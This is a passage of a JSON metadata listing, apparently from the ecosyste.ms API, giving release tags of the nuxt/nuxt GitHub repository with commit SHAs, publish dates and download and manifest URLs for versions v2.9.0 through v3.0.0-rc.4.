","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.2.0/manifests"},{"name":"v3.0.0-rc.4","sha":"be0e502a05a9c8bb2eeaa62459d611f6363be89f","kind":"commit","published_at":"2022-06-13T14:27:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4/manifests"},{"name":"v3.0.0-rc.3","sha":"36512d0eaaa32e0dd1d0887098fcf842a7fa66b1","kind":"commit","published_at":"2022-05-10T08:58:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3/manifests"},{"name":"@nuxt/ui-templates@0.1.1","sha":"2ea0ad23512a0ce341092dd08162503d94b8eef9","kind":"tag","published_at":"2022-05-07T18:01:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.1.1/manifests"},{"name":"v3.0.0-rc.2","sha":"a8d42d586f84b7cef66c7bf8b76eb560139e6f88","kind":"commit","published_at":"2022-05-02T20:47:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2/manifests"},{"name":"@nuxt/ui@0.1.1","sha":"434afa4351240467b5fd99a913adc4970ff99584","kind":"tag","published_at":"2022-05-02T09:31:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.1.1/manifests"},{"name":"v3.0.0-rc.1","sha":"0c2f07695702df33a63b88322d93d6815a227a0f","kind":"commit","published_at":"2022-04-20T21:09:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1/manifests"},{"name":"@nuxt/ui-templates@0.1.0","sha":"434afa4351240467b5fd99a913adc4970ff99584","kind":"tag","published_at":"2022-04-19T07:55:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.1.0/manifests"},{"name":"@nuxt/ui-assets@0.1.0","sha":"434afa4351240467b5fd99a913adc4970ff99584","kind":"tag","published_at":"2022-04-19T07:55:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-assets@0.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-assets@0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-assets%400.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.1.0/manifests"},{"name":"@nuxt/ui@0.1.0","sha":"434afa4351240467b5fd99a913adc4970ff99584","kind":"tag","published_at":"2022-04-19T07:55:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.1.0/manifests"},{"name":"v2.15.8","sha":"d4b9e4b0553bcd617ecbc0b8b76871070b347fcb","kind":"tag","published_at":"2021-08-11T21:10:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8/manifests"},{"name":"v2.15.7","sha":"4f370e2043b7731db0e8ef65a4f88431cd8795f3","kind":"tag","published_at":"2021-06-14T13:59:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7/manifests"},{"name":"v2.15.6","sha":"0eae970e74f1fbf29f400a3178f54061a79bfac2","kind":"tag","published_at":"2021-05-12T10:47:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6/manifests"},{"name":"v2.15.5","sha":"0460a278ab5258f0cd6d3fe8fc014f892b2bdaf6","kind":"tag","published_at":"2021-05-09T08:17:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5/manifests"},{"name":"v2.15.4","sha":"b39dcda6adf21e4eb82caef7895440755c6d96fc","kind":"tag","published_at":"2021-04-01T11:23:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4/manifests"},{"name":"v2.15.3","sha":"24a0c7e27123874f9545c46852b2e7d34920b017","kind":"tag","published_at":"2021-03-10T12:25:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3/manifests"},{"name":"v2.15.2","sha":"b7f9cdc2a44dbf25b1bd1845fdc8ebb65b0f0754","kind":"tag","published_at":"2021-02-23T09:20:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2/manifests"},{"name":"v2.15.1","sha":"95daddf43c3b9e9474870631727755ecd2e94319","kind":"tag","published_at":"2021-02-19T16:39:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1/manifests"},{"name":"v2.15.0","sha":"dcfb42b77221f559e7ccb09edd5c2a2004c5bc6b","kind":"tag","published_at":"2021-02-15T11:06:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0/manifests"},{"name":"v2.14.12","sha":"bde4c5f6b0e643716d97027cdd185891ada02f7f","kind":"tag","published_at":"2020-12-16T13:15:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12/manifests"},{"name":"v2.14.11","sha":"d85f4b92642f4668463deb286524d424e57a1f62","kind":"tag","published_at":"2020-12-09T23:21:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11/manifests"},{"name":"v2.14.10","sha":"e97051adfafb9517cabbfd9b87a02e8c37ce949e","kind":"tag","published_at":"2020-12-07T10:30:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10/manifests"},{"name":"v2.14.9","sha":"e9f380c9e6b729ab77b38babba6ad15e95b4efa8","kind":"tag","published_at":"2020-12-02T10:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9/manifests"},{"name":"v2.14.8","sha":"68d8fb84872b807b2149756bb97a84961854a2c3","kind":"tag","published_at":"2020-12-01T11:06:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8/manifests"},{"name":"v2.14.7","sha":"265d0e7aac3df9f83f323c4d2dba11434956fe9b","kind":"tag","published_at":"2020-10-15T16:29:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7/manifests"},{"name":"v2.14.6","sha":"41176577ad71a8b91a91ca8f458fd64a278dd88d","kind":"tag","published_at":"2020-09-21T10:46:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6/manifests"},{"name":"v2.14.5","sha":"3b037720f2edc3e351d200bbb8525df1e93d7aad","kind":"tag","published_at":"2020-09-10T12:36:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5/manifests"},{"name":"v2.14.4","sha":"1a77fba4eb247faa3f1c8ec0fa49ce372abeb1d8","kind":"tag","published_at":"2020-08-27T10:26:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4/manifests"},{"name":"v2.14.3","sha":"5e9d759d7bee6a3d32e16ef05eef988e882c600a","kind":"tag","published_at":"2020-08-16T17:04:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3/manifests"},{"name":"v2.14.2","sha":"34c56722c8c97c0c6a59ecfbc5836c38047e4572","kind":"tag","published_at":"2020-08-16T10:59:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2/manifests"},{"name":"v2.14.1","sha":"c30499d7e02cd6d8b51d97ee7d7a537d8a59f63b","kind":"tag","published_at":"2020-08-04T16:37:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1/manifests"},{"name":"v2.14.0","sha":"60f68638cb80ab461c5b02be34e8797677bd8dd1","kind":"tag","published_at":"2020-07-27T17:25:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0/manifests"},{"name":"v2.13.3","sha":"e3821ba78c23fafa753941a0c206bd23e39dd678","kind":"tag","published_at":"2020-07-02T18:08:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3/manifests"},{"name":"v2.13.2","sha":"c998072c94eef659d45819eaa2b18897b8923538","kind":"tag","published_at":"2020-06-26T19:03:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2/manifests"},{"name":"v2.13.1","sha":"56b158e7d689ba9f57e7aa83d672f5f32b18767b","kind":"tag","published_at":"2020-06-24T08:38:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1/manifests"},{"name":"v2.13.0","sha":"dbecbe4adae6a7ae172eb01a232d1804c7b996bc","kind":"tag","published_at":"2020-06-18T17:45:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0/manifests"},{"name":"v2.12.2","sha":"fb33bda6d114cde19b029ab71c810032ef51184f","kind":"tag","published_at":"2020-03-31T10:43:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2/manifests"},{"name":"v2.12.1","sha":"8d355956d49c71349d165c4ca7531107e20d7b27","kind":"tag","published_at":"2020-03-25T19:22:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1/manifests"},{"name":"v2.12.0","sha":"205a089f833f96298d9bd723aea15b93618ec05d","kind":"tag","published_at":"2020-03-17T16:45:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0/manifests"},{"name":"v2.11.0","sha":"7af9ec8c23d247b22f71866b7b5dcd100f08048d","kind":"tag","published_at":"2019-12-17T10:23:56.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0/manifests"},{"name":"v2.10.2","sha":"f6aa45dda605cae2ea51f7413c97190a7a02cb88","kind":"commit","published_at":"2019-10-21T21:16:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2/manifests"},{"name":"v2.10.1","sha":"624c4c058e47fd36c484efaf1494b762f585f633","kind":"tag","published_at":"2019-10-11T08:11:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1/manifests"},{"name":"v2.10.0","sha":"c17afa77a7c7490863c2040c8f448ba80082a891","kind":"tag","published_at":"2019-10-02T11:44:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0/manifests"},{"name":"v2.9.2","sha":"c8ee9a660809e856c28d8678c6a632bbdd6ed00f","kind":"tag","published_at":"2019-08-28T11:32:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"0157b971de97daecf2fadeafa5596ddaa30cdb28","kind":"tag","published_at":"2019-08-20T11:13:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"ce3b4569613866a69b96f0f89aa2bb7d9810f8c4","kind":"tag","published_at":"2019-08-20T08:24:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.9.0","tag_url":"https://repos.ecosyst